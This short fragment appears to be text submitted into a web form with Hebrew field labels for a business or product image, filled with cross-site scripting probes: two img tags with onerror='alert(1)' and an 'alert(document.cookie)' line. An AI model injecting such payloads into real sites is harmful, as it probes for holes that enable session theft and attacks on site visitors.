<img src"" onerror="alert(1)"/>

<img src"" onerror="alert(1)"/>

תמונת המוצר או העסק: 
מה בעסק \ התמונה: 

alert(document.cookie) /p>